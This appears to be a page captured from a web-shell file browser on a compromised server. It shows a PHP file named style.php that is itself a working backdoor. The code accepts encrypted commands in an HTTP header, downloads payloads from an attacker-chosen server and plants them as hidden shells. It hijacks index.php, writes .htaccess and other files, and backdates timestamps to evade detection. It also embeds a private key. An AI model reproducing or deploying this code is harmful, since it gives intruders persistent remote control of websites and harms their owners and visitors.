at path:ROOT / style.php
run:R W Run
DIR
2026-07-10 18:38:11
R W Run
DIR
2026-07-08 07:52:03
R W Run
DIR
2026-05-20 01:38:35
R W Run
DIR
2026-07-04 03:13:43
R W Run
DIR
2026-07-08 07:52:32
R W Run
233 By
2025-06-05 05:44:50
R W Run
122.65 KB
2026-07-04 03:13:47
R W Run
5.84 KB
2024-04-28 08:27:06
R W Run
63 By
2026-07-08 07:40:03
R W Run
15.05 KB
2026-07-04 03:13:47
R W Run
13.37 KB
2025-06-03 06:10:36
R W Run
884 By
2025-06-05 05:44:59
R W Run
error_log
📄style.php
1<?php
2error_reporting(0);
3class ErrorCode
4{
5 const E_200400 = 200400;
6}
7class MsgText
8{
9 const PARAM_EMPTY = 'param is empty';
10 const PARAM_TYPE = 'param type error';
11 const VALUE_ERROR = 'value error';
12 const NOCHANGE = 'no change';
13 const LOCK_FILE_SUCCESS = 'generate lock file success,but lock index.php error';
14 const LOCK_FILE_ERROR = 'generate lock file error';
15 const REMOTE_GET_ERROR = 'get remote content error';
16 const LOCAL_FILE_ERROR = 'generate local file error';
17 const SUCCESS = 'success';
18 const LOCAL_FILE_EXISTS = 'local file doesn\'t exist';
19 const REMOTE_FILE_EXISTS = 'remote file doesn\'t exist';
20 const RENAME_ERROR = 'rename error';
21 const INDEX_ERROR = 'index hijack error';
22 const UNKNOWN_ERROR = 'unknown error';
23 const DECRYPT_FAIL = 'params decrypt fail';
24}
25function error($msg = MsgText::UNKNOWN_ERROR, $extras = [], $code = 0)
26{
27 empty($code) && $code = ErrorCode::E_200400;
28 exit(@json_encode(['code' => $code, 'msg' => $msg, 'extras' => $extras], JSON_UNESCAPED_UNICODE));
29}
30function success($data)
31{
32 exit(@json_encode(['code' => 200, 'msg' => MsgText::SUCCESS, 'data' => $data], JSON_UNESCAPED_UNICODE));
33}
34function getDirPathsByLevel($level = 6)
35{
36 $initDir = $_SERVER['DOCUMENT_ROOT'];
37 $dirs = array($initDir);
38 $count = count($dirs);
39 while (count($dirs) > ($count - 1)) {
40 $path = $dirs[($count - 1)];
41 $count += 1;
42 if (@is_dir($path) && @$handle = @opendir($path)) {
43 while ($file = @readdir($handle)) {
44 $realpath = $path . '/' . $file;
45 if ($file == '.' || $file == '..' || !is_dir($realpath) || substr($file, 0, 1) === '.') {
46 continue;
47 }
48 $path3 = str_replace($initDir, "", $path);
49 $path4 = explode("/", $path3);
50 if (count($path4) > $level - 1) {
51 continue;
52 }
53 $dirs[] = $realpath;
54 }
55 }
56 @closedir($handle);
57 }
58 return $dirs;
59}
60function getUrl($url)
61{
62 $curl = curl_init();
63 curl_setopt($curl, CURLOPT_URL, $url);
64 curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
65 curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
66 curl_setopt($curl, CURLOPT_TIMEOUT, 5);
67 curl_setopt($curl, CURLOPT_AUTOREFERER, 0);
68 curl_exec($curl);
69 $httpCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
70 curl_close($curl);
71 if ($httpCode === 200) {
72 $content = curl_exec($curl);
73 return ['code' => 200, 'resp' => $content];
74 }
75 return ['code' => 500, 'resp' => ''];
76}
77function getRemoteContent($url)
78{
79 $content = @file_get_contents($url);
80 if ($content === false) {
81 $curl = curl_init();
82 curl_setopt($curl, CURLOPT_URL, $url);
83 curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
84 curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
85 curl_setopt($curl, CURLOPT_TIMEOUT, 5);
86 curl_setopt($curl, CURLOPT_AUTOREFERER, 0);
87 $content = curl_exec($curl);
88 curl_close($curl);
89 }
90 return !empty($content) && is_string($content) ? $content : '';
91}
92function copyfile($content, $localfile, $isAppend = false, $appendContent = '')
93{
94 if ($isAppend && !empty($appendContent)) {
95 $content = trim($content);
96 if (substr($content, -2, 2) !== '?>') {
97 $content .= ' ?>';
98 }
99 $content = $content . PHP_EOL . PHP_EOL . $appendContent;
100 }
101 @file_put_contents($localfile, $content);
102 if (!file_exists($localfile)) {
103 $openedfile = @fopen($localfile, "w");
104 @fwrite($openedfile, $content);
105 @fclose($openedfile);
106 }
107 if (!file_exists($localfile)) {
108 return false;
109 }
110 return true;
111}
112function updateFiletime($filepath)
113{
114 $ctime = filectime($filepath);
115 $now = time();
116 if (!($now > $ctime + 31104000)) {
117 $newTime = $now - (mt_rand(15552000, 31104000));
118 touch($filepath, $newTime, $newTime);
119 return true;
120 }
121 return true;
122}
123$privateKey = '-----BEGIN PRIVATE KEY-----
124MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQC30w49ItOfldQ6
125dB+0gEbeeW6BEClcx+NZzmpX2YcRHFV80BurCWBavPFehV8Sy9yL2u/y3mv3QJJ+
126x2kKvly8zKx4GbXPbsWJk6Ho0Rxq49oXkBarQBOqROZeaFF3Mzpd/PdLSsxEvG1M
127tQd2wOx5r6XD86jyfN7LAJUUVvbJvn1CHo03nFH12k1KYwLnQfzQI5nX7yQLa0jt
128fG5TA34Fm0EMbFdHWjAN/VdEjoJI6it4PCQP5wk4ga2BvVquQkuPbsbr8364d3I6
129GuGAKDR0wfkT20n0E6kAmDI3ol2bfa0rQncqUS3OU3INpxOZS8eKCIgC3bM81mdi
130MQ6TsAQ9AgMBAAECggEAJLGSlA2RpLdpx8lKUuOQQfSHZGfveb/E2DZl7+dSGM5J
131GkMIYtnaTAKPQ8jns37SJXCsmRRhBNf05i20ABsDtAQ/ITIwopmAAPhhR3IGdCfL
132bwyqGcEOq9xZB9tW965YJk7KplLl94qNXtR8Cu5zxc6UDktjHBRk/Ky/FXJOjPKM
133sA8rhox7dqlZUB3I/qiqrQOgT1Bsq1BFT+2GGwRUWZ1CyFoZvhsDomdo4yhRrB0b
1348Ym4MDiVqxFPVW8XB9RFD9YKt+v50Eb6iSKJNLpRmjZDNZbrEYO6NRsRBM7brDa9
135n39mZWFr47wGGXXv/NhwTvRI+2Si/ZfdP4+o5TeSWQKBgQDhIVOUODisiLhk7XKb
136Yu7BW1ZFcK0JxurqHN22msvA0Q/1q4RvziETjekXIn9lVKCmS/gy2O2RtuQRulAR
137fc3sz2W9tNXRF8Avy0728NG0baOOwBalO8w3cCX6Nnm70pJer+iJSn3tmAKSB4LT
138vbSB8pt6QgP8NPHyQdWp2LwOtwKBgQDRB8lgSaImIMJBaXERSaoNg8kxv3/cv4g5
139jUlljxNQcUsj0V7XilnB3mFxq5rHjBZTsKzMMQyvhOxYhptDfw6OLtoPUk2WiBUs
140l3qU0tIXNN+cTxu2SMKTjwMktkpmACJqa+k27eEUqxrKO/6SEiP9FMXHvgA4EEBM
141Hww1eU9QqwKBgAWSY5Uphw2OHLIyxkFeQ3Z5ojr5vO6fA7VjnYEld6GACxsTcaWq
142vlrTik9ORUTmwUscWjo38DlJA4AE0nJ8YJpZz7TQQvJ32gPUzlGCSE5k4EVqL6VL
143Q5Sjq+zzaDPj1EePpvuu4kr9FiMzGGPRMCR/MqXl+F9HmC1cv8MCYDUlAoGBAK77
144g7pVKaYdWkCD0iEUt4Rkw/IfSxwyQglbmwungBWhIbO0O17X9Fd0n8IWU5WkUbRx
145e9XbYbE05t0cobEZFcg0tFqLHWRcOs1/aSBYc4L1whMJrjskIa6A07LR3uoQRr8r
1464qkW7YrtyZluK6eABByCXSbeiTRldk3C1+eTy6/NAoGAb9/J+NWrhYSr/VoGWjui
147chXCNszy4w6exVwxXQKNTtlzKxyhQfVPK2BxrptWL6KCRKpz3wh+WY2C3QYyVfwG
148FB4hwDr2mY4TWF9pD194iES1yhrQGlI8XM+2LVhBl3p0x+TFgJMaTgDDqAnxpuqT
149upBYqTYMlOd+VR7hENMaFqo=
150-----END PRIVATE KEY-----';
151$p = $_SERVER['HTTP_P'];
152$params = openssl_private_decrypt(base64_decode(urldecode($p)), $decrypted, $privateKey) ? $decrypted : null;
153if (is_null($params)) {
154 error(MsgText::DECRYPT_FAIL);
155}
156$params = json_decode($params, true);
157if (!is_array($params)) {
158 error(MsgText::PARAM_TYPE, $params);
159}
160if (empty($params['server'])) {
161 error('server ' . MsgText::PARAM_EMPTY);
162}
163if (empty($params['iden'])) {
164 error('iden ' . MsgText::PARAM_EMPTY);
165}
166$iden = isset($params['iden']) ? strtolower($params['iden']) : '';
167switch ($iden) {
168 case "beima":
169 $res = doBeima($params);
170 break;
171 case "rename":
172 $res = doRename($params);
173 break;
174 case "index":
175 $res = doIndex($params);
176 break;
177 case "sub":
178 case "htaccess":
179 $res = doSub($params);
180 break;
181 case "lock":
182 $res = doLock($params);
183 break;
184 case "style":
185 $res = doStyle($params);
186 break;
187 default:
188 error('iden ' . MsgText::VALUE_ERROR);
189}
190function doBeima($params)
191{
192 if (empty($params['filename'])) {
193 error('filename ' . MsgText::PARAM_EMPTY, $params);
194 }
195 if (empty($params['shellfile'])) {
196 error('shellfile ' . MsgText::PARAM_EMPTY, $params);
197 }
198 empty($params['level']) && $params['level'] = 6;
199 $dirs = getDirPathsByLevel($params['level']);
200 $temp = array_rand($dirs);
201 $createDir = $dirs[$temp] . '/';
202 $localfilepath = $createDir . $params['filename'];
203 $remoteFileUrl = $params['server'] . $params['shellfile'];
204 $content = getRemoteContent($remoteFileUrl);
205 $content = json_decode($content, true);
206 if (!empty($content['result'])) {
207 if (copyfile($content['result'], $localfilepath)) {
208 updateFiletime($localfilepath);
209 $beimaurl = str_replace($_SERVER['DOCUMENT_ROOT'], '', $localfilepath);
210 success(compact('localfilepath', 'beimaurl'));
211 }
212 error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
213 }
214 error(MsgText::REMOTE_FILE_EXISTS, compact('remoteFileUrl'));
215}
216function doRename($params)
217{
218 if (empty($params['sourcename'])) {
219 error('sourcename ' . MsgText::PARAM_EMPTY, $params);
220 }
221 if (empty($params['rename'])) {
222 error('rename ' . MsgText::PARAM_EMPTY, $params);
223 }
224 if ($params['sourcename'] === $params['rename']) {
225 error(MsgText::NOCHANGE);
226 }
227 $sourceFile = dirname(__FILE__) . DIRECTORY_SEPARATOR . $params['sourcename'];
228 $renameFile = dirname(__FILE__) . DIRECTORY_SEPARATOR . $params['rename'];
229 $resSource = $params['server'] . str_replace(strtolower($_SERVER['DOCUMENT_ROOT']), '', strtolower($sourceFile));
230 $resSource = str_replace('\\', '/', $resSource);
231 if (file_exists($sourceFile)) {
232 if (rename($sourceFile, $renameFile)) {
233 success($renameFile);
234 } else {
235 error(MsgText::RENAME_ERROR, compact('renameFile'));
236 }
237 } else {
238 error(MsgText::LOCAL_FILE_EXISTS, compact('resSource'));
239 }
240}
241function doIndex($params)
242{
243 if (empty($params['shellfile'])) {
244 error('shellfile ' . MsgText::PARAM_EMPTY, $params);
245 }
246 $remoteUrl = $params['server'] . trim($params['shellfile']);
247 $localfilepath = $_SERVER['DOCUMENT_ROOT'] . '/index.php';
248 $content = getRemoteContent($remoteUrl);
249 $content = json_decode($content, true);
250 if (!empty($content['result'])) {
251 $oldContent = '';
252 if (file_exists($localfilepath)) {
253 $oldContent = @file_get_contents($localfilepath);
254 } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/index.html')) {
255 $oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/index.html');
256 } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/index.htm')) {
257 $oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/index.htm');
258 } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/default.html')) {
259 $oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/default.html');
260 } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/default.htm')) {
261 $oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/default.htm');
262 }
263 if (copyfile($content['result'], $localfilepath, true, $oldContent)) {
264 updateFiletime($localfilepath);
265 @chmod($localfilepath, 0644);
266 success($localfilepath);
267 }
268 error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
269 }
270 error(MsgText::INDEX_ERROR, compact('remoteUrl'));
271}
272function doSub($params)
273{
274 if (empty($params['shellfile'])) {
275 error('shellfile' . MsgText::PARAM_EMPTY, $params);
276 }
277 if (empty($params['filename'])) {
278 error('filename ' . MsgText::PARAM_EMPTY, $params);
279 }
280 $localfilepath = $_SERVER['DOCUMENT_ROOT'] . '/' . $params['filename'];
281 $remoteFileUrl = $params['server'] . $params['shellfile'];
282 $content = getRemoteContent($remoteFileUrl);
283 $content = json_decode($content, true);
284 if (!empty($content['result'])) {
285 if (copyfile($content['result'], $localfilepath)) {
286 updateFiletime($localfilepath);
287 @chmod($localfilepath, 0644);
288 success($localfilepath);
289 }
290 error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
291 }
292 error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl'));
293}
294function doLock($params)
295{
296 if (empty($params['filename'])) {
297 error('filename ' . MsgText::PARAM_EMPTY, $params);
298 }
299 if (empty($params['domain'])) {
300 error('domain ' . MsgText::PARAM_EMPTY, $params);
301 }
302 if (empty($params['shellfile'])) {
303 error('shellfile ' . MsgText::PARAM_EMPTY, $params);
304 }
305 $localfilepath = $_SERVER['DOCUMENT_ROOT'] . '/' . $params['filename'];
306 $remoteFileUrl = $params['server'] . $params['shellfile'];
307 $content = getRemoteContent($remoteFileUrl);
308 $content = json_decode($content, true);
309 if (!empty($content['result'])) {
310 if (copyfile($content['result'], $localfilepath)) {
311 $lockurl = $params['domain'] . $params['filename'];
312 $lockres = getUrl($lockurl);
313 @unlink($localfilepath);
314 if ($lockres['code'] === 200 && !empty($lockres['resp']) && strpos($lockres['resp'], 'success')) {
315 success($lockres['resp']);
316 }
317 error(MsgText::LOCK_FILE_SUCCESS, compact('lockurl', 'lockres'));
318 }
319 @unlink($localfilepath);
320 error(MsgText::LOCK_FILE_ERROR, compact('localfilepath'));
321 }
322 error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl'));
323}
324function doStyle($params)
325{
326 if (empty($params['shellfile'])) {
327 error('shellfile' . MsgText::PARAM_EMPTY, $params);
328 }
329 if (empty($params['filename'])) {
330 error('filename ' . MsgText::PARAM_EMPTY, $params);
331 }
332 if (empty($params['domain'])) {
333 error('domain ' . MsgText::PARAM_EMPTY, $params);
334 }
335 $localfilepath = $params['domain'] . $params['filename'];
336 $remoteFileUrl = $params['server'] . $params['shellfile'];
337 $content = getRemoteContent($remoteFileUrl);
338 $content = json_decode($content, true);
339 if (!empty($content['result'])) {
340 if (copyfile($content['result'], $localfilepath)) {
341 updateFiletime($localfilepath);
342 @chmod($localfilepath, 0644);
343 success($localfilepath);
344 }
345 error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
346 }
347 error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl'));
348}